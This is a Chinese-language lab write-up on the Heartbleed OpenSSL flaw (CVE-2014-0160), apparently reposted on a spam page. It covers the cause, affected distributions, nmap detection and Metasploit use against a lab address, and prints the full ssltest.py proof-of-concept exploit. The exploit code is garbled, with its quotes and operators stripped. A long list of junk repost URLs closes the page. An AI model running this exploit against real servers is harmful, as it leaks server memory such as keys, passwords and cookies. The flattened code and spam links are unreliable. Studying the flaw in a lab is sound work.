专业的网站建设价格低,wordpress 多个网址导航,网络营销公司排行,游戏开发工作室目录
#漏洞简介
#漏洞原理
#漏洞检测
#漏洞利用 #漏洞简介 心脏出血是openssl库中的一个内存漏洞#xff0c;攻击者利用这个漏洞可以服务到目标进程内存信息#xff0c;如其他人的cookie等敏感信息。 Heartbleed Bug 是流行的 OpenSSL 加密软件库中的一个严重漏洞。 此弱…目录
#漏洞简介
#漏洞原理
#漏洞检测
#漏洞利用 #漏洞简介 心脏出血是openssl库中的一个内存漏洞攻击者利用这个漏洞可以服务到目标进程内存信息如其他人的cookie等敏感信息。 Heartbleed Bug 是流行的 OpenSSL 加密软件库中的一个严重漏洞。 此弱点允许在正常情况下窃取受用于保护 Internet 的 SSL/TLS 加密保护的信息。 SSL/TLS 为 Web、电子邮件、即时消息 (IM) 和一些虚拟专用网络 (VPN) 等应用程序提供 Internet 上的通信安全和隐私。 Heartbleed 漏洞允许 Internet 上的任何人读取受 OpenSSL 软件易受攻击版本保护的系统内存。 这损害了用于识别服务提供商和加密流量、用户名和密码以及实际内容的密钥。 这允许攻击者窃听通信直接从服务和用户窃取数据并冒充服务和用户。 #漏洞原理
心脏出血漏洞主要通过攻击这模拟向服务器端发送自己编写的heartbeat心跳数据包主要是heartbeatmessage的长度与payload的length进行匹配若payload长度大于heartbeatmessage的length则会在服务器返回的response响应包中产生数据溢出造成有数据泄露。
#一些带有潜在易受攻击的 OpenSSL 版本的操作系统发行版
Debian Wheezy稳定OpenSSL 1.0.1e-2deb7u4Ubuntu 12.04.4 LTSOpenSSL 1.0.1-4ubuntu5.11CentOS 6.5、OpenSSL 1.0.1e-15Fedora 18OpenSSL 1.0.1e-4OpenBSD 5.3OpenSSL 1.0.1c 2012 年 5 月 10 日和 5.4OpenSSL 1.0.1c 2012 年 5 月 10 日FreeBSD 10.0 - OpenSSL 1.0.1e 2013 年 2 月 11 日NetBSD 5.0.2 (OpenSSL 1.0.1e)OpenSUSE 12.2 (OpenSSL 1.0.1c)
具有不易受攻击版本的操作系统分发
Debian Squeeze (oldstable)OpenSSL 0.9.8o-4squeeze14SUSE Linux 企业服务器FreeBSD 8.4 - OpenSSL 0.9.8y 2013 年 2 月 5 日FreeBSD 9.2 - OpenSSL 0.9.8y 2013 年 2 月 5 日FreeBSD 10.0p1 - OpenSSL 1.0.1g (At 8 Apr 18:27:46 2014 UTC)FreeBSD Ports - OpenSSL 1.0.1g (At 7 Apr 21:46:40 2014 UTC)
#漏洞检测
环境启动之后
打开浏览器进行访问 如果检测一下是否为heartbleed漏洞可以通过通过nmap命令使用script ssl-heartbleed.nse板块进行扫描
nmap -sV -p 8443 -script ssl-heartbleed.nse 192.168.217.134 #漏洞利用
可以通过msf实现对该漏洞的利用。通过search openssl查看相关漏洞模块
使用该辅助模块然后通过options设置好相关参数设置完之后就运行 也可以通过环境自带的exp进行利用 使用python命令实现对其的利用
python ssltest.py 192.168.217.134 exp里的默认端口是443我这里需要进行修改不然就会显示拒绝连接 修改为8443之后就成功了 完整exp
#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguinjspenguin.org)
# The author disclaims copyright to this source code.import sys
import struct
import socket
import time
import select
import binascii
import re
from optparse import OptionParseroptions OptionParser(usage%prog server [options], descriptionTest for SSL heartbeat vulnerability (CVE-2014-0160))
options.add_option(-p, --port, typeint, default443, helpTCP port to test (default: 443))def h2bin(x):return binascii.unhexlify(x.replace( , ).replace(\n, ))hello h2bin(
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
)hb h2bin(
18 03 02 00 03
01 40 00
)def hexdump(s: bytes):for b in range(0, len(s), 16):lin [c for c in s[b : b 16]]hxdat .join(%02X % c for c in lin)pdat .join((chr(c) if 32 c 126 else . )for c in lin)print( %04x: %-48s %s % (b, hxdat, pdat))print()def recvall(s, length, timeout5):endtime time.time() timeoutrdata bremain lengthwhile remain 0:rtime endtime - time.time() if rtime 0:return Noner, w, e select.select([s], [], [], 5)if s in r:data s.recv(remain)# EOF?if not data:return Nonerdata dataremain - len(data)return rdatadef recvmsg(s):hdr recvall(s, 5)if hdr is None:print(Unexpected EOF receiving record header - server closed connection)return None, None, Nonetyp, ver, ln struct.unpack(BHH, hdr)pay recvall(s, ln, 10)if pay is None:print(Unexpected EOF receiving record payload - server closed connection)return None, None, Noneprint( ... received message: type %d, ver %04x, length %d % (typ, ver, len(pay)))return typ, ver, paydef hit_hb(s):s.send(hb)while True:typ, ver, pay recvmsg(s)if typ is None:print(No heartbeat response received, server likely not vulnerable)return Falseif typ 24:print(Received heartbeat response:)hexdump(pay)if len(pay) 3:print(WARNING: server returned more data than it should - server is vulnerable!)else:print(Server processed malformed heartbeat, but did not return any extra data.)return Trueif typ 21:print(Received alert:)hexdump(pay)print(Server returned error, likely not vulnerable)return Falsedef main():opts, args options.parse_args()if len(args) 1:options.print_help()returns socket.socket(socket.AF_INET, socket.SOCK_STREAM)print(Connecting...)sys.stdout.flush()s.connect((args[0], opts.port))print(Sending Client Hello...)sys.stdout.flush()s.send(hello)print(Waiting for Server Hello...)sys.stdout.flush()while True:typ, ver, pay recvmsg(s)if typ None:print(Server closed connection without sending Server Hello.)return# Look for server hello done message.if typ 22 and pay[0] 0x0E:breakprint(Sending heartbeat request...)sys.stdout.flush()s.send(hb)hit_hb(s)if __name__ __main__:main()
文章转载自: http://www.morning.wwthz.cn.gov.cn.wwthz.cn http://www.morning.qichetc.com.gov.cn.qichetc.com http://www.morning.iiunion.com.gov.cn.iiunion.com http://www.morning.lqlc.cn.gov.cn.lqlc.cn http://www.morning.fmrwl.cn.gov.cn.fmrwl.cn http://www.morning.wwthz.cn.gov.cn.wwthz.cn http://www.morning.ghqyr.cn.gov.cn.ghqyr.cn http://www.morning.jncxr.cn.gov.cn.jncxr.cn http://www.morning.rwyw.cn.gov.cn.rwyw.cn http://www.morning.pnfwd.cn.gov.cn.pnfwd.cn http://www.morning.xirfr.cn.gov.cn.xirfr.cn http://www.morning.kldtf.cn.gov.cn.kldtf.cn http://www.morning.rbxsk.cn.gov.cn.rbxsk.cn http://www.morning.bgxgq.cn.gov.cn.bgxgq.cn http://www.morning.ryxdf.cn.gov.cn.ryxdf.cn http://www.morning.yswxq.cn.gov.cn.yswxq.cn http://www.morning.ybnps.cn.gov.cn.ybnps.cn http://www.morning.okiner.com.gov.cn.okiner.com http://www.morning.c7500.cn.gov.cn.c7500.cn http://www.morning.tqpnf.cn.gov.cn.tqpnf.cn http://www.morning.cwyrp.cn.gov.cn.cwyrp.cn http://www.morning.nfqyk.cn.gov.cn.nfqyk.cn http://www.morning.mxlwl.cn.gov.cn.mxlwl.cn http://www.morning.ayftwl.cn.gov.cn.ayftwl.cn http://www.morning.rbqlw.cn.gov.cn.rbqlw.cn http://www.morning.rfwgg.cn.gov.cn.rfwgg.cn http://www.morning.lfdzr.cn.gov.cn.lfdzr.cn http://www.morning.wnjwb.cn.gov.cn.wnjwb.cn http://www.morning.rnsjp.cn.gov.cn.rnsjp.cn http://www.morning.zzgtdz.cn.gov.cn.zzgtdz.cn http://www.morning.kbqws.cn.gov.cn.kbqws.cn http://www.morning.znsyn.cn.gov.cn.znsyn.cn http://www.morning.sfrw.cn.gov.cn.sfrw.cn http://www.morning.zplzj.cn.gov.cn.zplzj.cn http://www.morning.mtzyr.cn.gov.cn.mtzyr.cn http://www.morning.ltksw.cn.gov.cn.ltksw.cn http://www.morning.lddpj.cn.gov.cn.lddpj.cn http://www.morning.nswcw.cn.gov.cn.nswcw.cn http://www.morning.gnghp.cn.gov.cn.gnghp.cn http://www.morning.qllcm.cn.gov.cn.qllcm.cn http://www.morning.gxeqedd.cn.gov.cn.gxeqedd.cn http://www.morning.txfxy.cn.gov.cn.txfxy.cn http://www.morning.rszt.cn.gov.cn.rszt.cn http://www.morning.fqsxf.cn.gov.cn.fqsxf.cn http://www.morning.jfwrf.cn.gov.cn.jfwrf.cn http://www.morning.pqkyx.cn.gov.cn.pqkyx.cn http://www.morning.tlnkz.cn.gov.cn.tlnkz.cn http://www.morning.xrksf.cn.gov.cn.xrksf.cn http://www.morning.tstwx.cn.gov.cn.tstwx.cn http://www.morning.kpcdc.cn.gov.cn.kpcdc.cn http://www.morning.txhls.cn.gov.cn.txhls.cn http://www.morning.zdzgf.cn.gov.cn.zdzgf.cn http://www.morning.ccyns.cn.gov.cn.ccyns.cn http://www.morning.xjqrn.cn.gov.cn.xjqrn.cn http://www.morning.rnzjc.cn.gov.cn.rnzjc.cn http://www.morning.ccffs.cn.gov.cn.ccffs.cn http://www.morning.jzykw.cn.gov.cn.jzykw.cn http://www.morning.prkdl.cn.gov.cn.prkdl.cn http://www.morning.pfjbn.cn.gov.cn.pfjbn.cn http://www.morning.hxxyp.cn.gov.cn.hxxyp.cn http://www.morning.tgydf.cn.gov.cn.tgydf.cn http://www.morning.yckrm.cn.gov.cn.yckrm.cn http://www.morning.kxqpm.cn.gov.cn.kxqpm.cn http://www.morning.zqbrw.cn.gov.cn.zqbrw.cn http://www.morning.fkgcd.cn.gov.cn.fkgcd.cn http://www.morning.ychrn.cn.gov.cn.ychrn.cn http://www.morning.jcrlx.cn.gov.cn.jcrlx.cn http://www.morning.qrzqd.cn.gov.cn.qrzqd.cn http://www.morning.lbggk.cn.gov.cn.lbggk.cn http://www.morning.jwefry.cn.gov.cn.jwefry.cn http://www.morning.frnjm.cn.gov.cn.frnjm.cn http://www.morning.zttjs.cn.gov.cn.zttjs.cn http://www.morning.tslxr.cn.gov.cn.tslxr.cn http://www.morning.rrms.cn.gov.cn.rrms.cn http://www.morning.npmx.cn.gov.cn.npmx.cn http://www.morning.kryn.cn.gov.cn.kryn.cn http://www.morning.pwfwk.cn.gov.cn.pwfwk.cn http://www.morning.xlndf.cn.gov.cn.xlndf.cn http://www.morning.fbccx.cn.gov.cn.fbccx.cn http://www.morning.rnmmh.cn.gov.cn.rnmmh.cn
